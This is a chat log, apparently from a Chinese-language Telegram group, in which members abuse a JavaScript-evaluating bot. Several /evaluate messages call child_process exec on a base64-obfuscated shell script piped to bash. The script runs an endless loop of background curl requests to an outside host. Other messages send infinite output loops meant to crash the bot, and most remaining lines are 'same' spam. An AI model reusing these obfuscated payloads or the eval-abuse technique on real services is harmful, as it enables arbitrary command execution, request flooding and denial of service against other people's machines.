/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9YGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTNgDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpzPSQoKGBkYXRlICIrJXMlTiIgfCBjdXQgLWIxLTEzYCAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQplY2hvIC1lICIkY1x0JHMiDQpkb25l" | base64 -d | bash'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
/evaluate console.log("123")
/evaluate console.log("123")
same
@mmis1000 怎麼看function內容阿
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9YGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTNgDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpzPSQoKGBkYXRlICIrJXMlTiIgfCBjdXQgLWIxLTEzYCAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQplY2hvIC1lICIkY1x0JHMiDQpkb25l" | base64 -d '; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
機器反應不過來了w
這個主機很爛啦w 不然ysitd主機借放(?
YSITD 要全大寫阿阿阿阿!
沒反應了.-.
這是docker喔,我不清楚
為什麼推上去就起不來了._.
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9YGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTNgDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpzPSQoKGBkYXRlICIrJXMlTiIgfCBjdXQgLWIxLTEzYCAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQplY2hvIC1lICIkY1x0JHMiDQpkb25l" | base64 -d | sh'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
same
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "Ly9pbml0ZGF0ZT1gZGF0ZSAiKyVzJU4iIHwgY3V0IC1iMS0xM2ANCmM9MA0Kd2hpbGUgdHJ1ZQ0KZG8NCmM9JCgoJGMgKyAxKSkNCi8vcz0kKChgZGF0ZSAiKyVzJU4iIHwgY3V0IC1iMS0xM2AgLSAkaW5pdGRhdGUpKQ0KY3VybCAiaHR0cDovL3Nydi5zZWFkb2cwMDcubWUvdGVzdC5odG1sP2M9JGMmcz0kcyIgJg0KZWNobyAtZSAiJGNcdCRzIg0KZG9uZQ==" | base64 -d | bash'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
same
一個被無視的概念
他bash來亂的喔._.
好怪
他好像只理我
喔我大概知道為什麼
/evaluate console.log(installModule.toString())
same
/evaluate var i=0;while(++i)console.log(i)
對.-.
same
same
same
same
same
有 @nodeCodeEvaluatingBot 會爆炸
same
OAO
same
same
same
same
same
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9YGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTNgDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpzPSQoKGBkYXRlICIrJXMlTiIgfCBjdXQgLWIxLTEzYCAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQplY2hvIC1lICIkY1x0JHMiDQpkb25l" | base64 -d > test.sh; bash test.sh'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
same
這隻到底誰的
++
我先吃一下東西 等會再來改判斷式
我們可不可以自己開一個 YSITD BOT Testpool
可以吧
/evaluate console.log ( "123" );
/start
Hello BirkhoffLee@tg, I am ysitdbot. You could use /help to get all commands and usage of this bot.
same
same
same
same
1
1
1
1
@seadog007 玩比特幣好賺嗎
難喔
ouo
/evaluate 1
/evaluate 1
/evaluate 1
/evaluate console.log ( " 12 3 1 23" )
直接換了一個 node.js tg bot api wwwwwwwww 前一個不能getme
/evaluate var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9YGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTNgDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpzPSQoKGBkYXRlICIrJXMlTiIgfCBjdXQgLWIxLTEzYCAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQplY2hvIC1lICIkY1x0JHMiDQpkb25l" | base64 -d > test.sh; bash test.sh'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });
same
1 1
不知道tgbot要怎麼讓他跑出same.-.
same
有了w
same
same
same
/evaluate console.log("owo")
/evaluate while(true) console.log(Math.pow(new Date(), 2))
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
same
/evaluatequiet owo()
same
same